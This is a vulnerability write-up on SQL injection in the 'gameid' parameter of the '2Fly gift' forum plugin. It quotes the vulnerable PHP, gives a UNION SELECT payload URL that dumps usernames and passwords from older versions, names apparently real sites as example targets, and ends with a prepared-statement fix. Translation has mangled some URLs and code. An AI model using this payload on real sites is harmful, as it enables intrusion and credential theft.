Plug-in name: 2Fly gift (serial number) Issuing System
Vulnerable file: 2fly_gift.php (the latest version only)
Author: CN. Tnik & Tojen (fellow villagers)
Code Analysis:
The root cause is that the gameid parameter is not filtered before it is placed into SQL queries, which leads to SQL injection.
1. gameid in the output branch:
// $gameid comes straight from the request and is concatenated unquoted
$query = $db->query("SELECT * FROM `{$tablepre}2fly_gift` WHERE `id` = $gameid LIMIT 1");
$game = $db->fetch_array($query);
http://www.klcwsj.com/2fly_gift.php?action=output&gameid=45
http://bbs.yeswan.com/2fly_gift.php?action=output&gameid=16
However, after a union there is no output position where the data is displayed, so no data comes back.
2. The gameid in the ipvsors branch is not filtered:
// Same pattern: unfiltered $gameid concatenated into the WHERE clause
$query = $db->query("SELECT id, good_names, acc, total, remain, record, expiration FROM `{$tablepre}2fly_gift` WHERE `id` = $gameid LIMIT 1");
$game = $db->fetch_array($query);
http://bbs.yeswan.com/2fly_gift... ecord & gameid = 17
This is an obvious injection and it looked exploitable at first, but the code that follows the query gets in the way:
$recordb = explode('||', $game['record']);
// The delimiter of this explode() is empty in the page's copy of the code
$acc2 = explode("", $game['acc']);
$remain = $game['remain'];
$remain2 = $game['remain'] + 1;
/* Analyze the uid of the members who have already received a gift */
foreach ($recordb as $recordnow)
{
    $recordc = explode('_', $recordnow);
    $recordd[] = substr($recordc[0], 1);
    $TsbuserID[] = $recordc[0];
    $Tsbfafang[] = $recordc[1];
    $RandomPW[] = $recordc[2];
    $CheckboxTsb[] = $recordc[3];
    if (substr($recordc[0], 1) != '')
    {
        if ($recordc[0])
            $uids .= ',' . substr($recordc[0], 1);
    }
}
$table .= "<form name=form1 method=post action=2fly_gift.php?action=extends SORS&pages=view_record_edit&gameid=" .
    $gameid . ">";
/* Read the user names; $uids is built from the row fetched above */
$uidss = array();
$uidquery = $db->query("SELECT uid, username FROM {$tablepre}members WHERE uid IN (" .
    substr($uids, 1) . ") ORDER BY uid ASC");
As soon as and 1 = 2 is added, the first query returns no row, so $uids is null and the IN () list of the second query is empty, which raises an error. The injection is blocked here and no data is displayed. Other places are not covered here; check whether there is a good way to get past this. The file also contains some update SQL statements, and it is not known whether they can be used.
However, previous versions can still be exploited:
They have a content branch:
Http://www.iacct.cn/2fly_gift.php? Pages = content & gameid = 16 and 1 = 2 union select 1, 2, 3, 4, concat (username,
0x3a, password), 6, 7, 8, 9, 10, 11, 12, 13, 16, 17, 18, 19, 20, 21, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37 from week
The password is exposed.
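
One way to close the gameid injection in the branches analyzed above, as an added example that is not the plugin's own code: gameid is validated as an integer, bound as a parameter, and the uid list taken from the record field is cast and checked before the second query. The in-memory SQLite tables, the sample rows and the helper names parse_gameid() and claimed_members() are assumptions made for the demonstration.

```php
<?php
// Added example, not the plugin's code. Tables, rows and helper names are
// assumptions; in-memory SQLite stands in for the forum database.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE gift (id INTEGER PRIMARY KEY, record TEXT)');
$pdo->exec('CREATE TABLE members (uid INTEGER PRIMARY KEY, username TEXT)');
// Constructed rows; record uses the "||" and "_" layout parsed on this page.
$pdo->exec("INSERT INTO gift VALUES (16, 'u3_a_pw_1||u7_b_pw_0'), (17, '')");
$pdo->exec("INSERT INTO members VALUES (3, 'alice'), (7, 'bob')");
// Accept only a positive decimal integer; anything else yields null.
function parse_gameid($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Look up the gift with a bound parameter, then the members who claimed it.
function claimed_members(PDO $pdo, $rawGameid): ?array
{
    $gameid = parse_gameid($rawGameid);
    if ($gameid === null) {
        return null;                  // rejected before any SQL is built
    }
    $stmt = $pdo->prepare('SELECT record FROM gift WHERE id = ? LIMIT 1');
    $stmt->execute([$gameid]);
    $record = $stmt->fetchColumn();
    if ($record === false) {
        return null;                  // unknown gift id
    }
    $uids = [];
    foreach (explode('||', (string) $record) as $recordnow) {
        $uid = (int) substr(explode('_', $recordnow)[0], 1); // cast before SQL
        if ($uid > 0) {
            $uids[] = $uid;
        }
    }
    if ($uids === []) {
        return [];                    // never send "IN ()" built from an empty list
    }
    $in = implode(',', array_fill(0, count($uids), '?'));
    $stmt = $pdo->prepare("SELECT uid, username FROM members WHERE uid IN ($in) ORDER BY uid ASC");
    $stmt->execute($uids);
    return $stmt->fetchAll(PDO::FETCH_KEY_PAIR);
}

var_dump(claimed_members($pdo, '16'));          // valid id
var_dump(claimed_members($pdo, '17'));          // gift nobody has claimed
var_dump(claimed_members($pdo, '16 and 1=2'));  // injected string
```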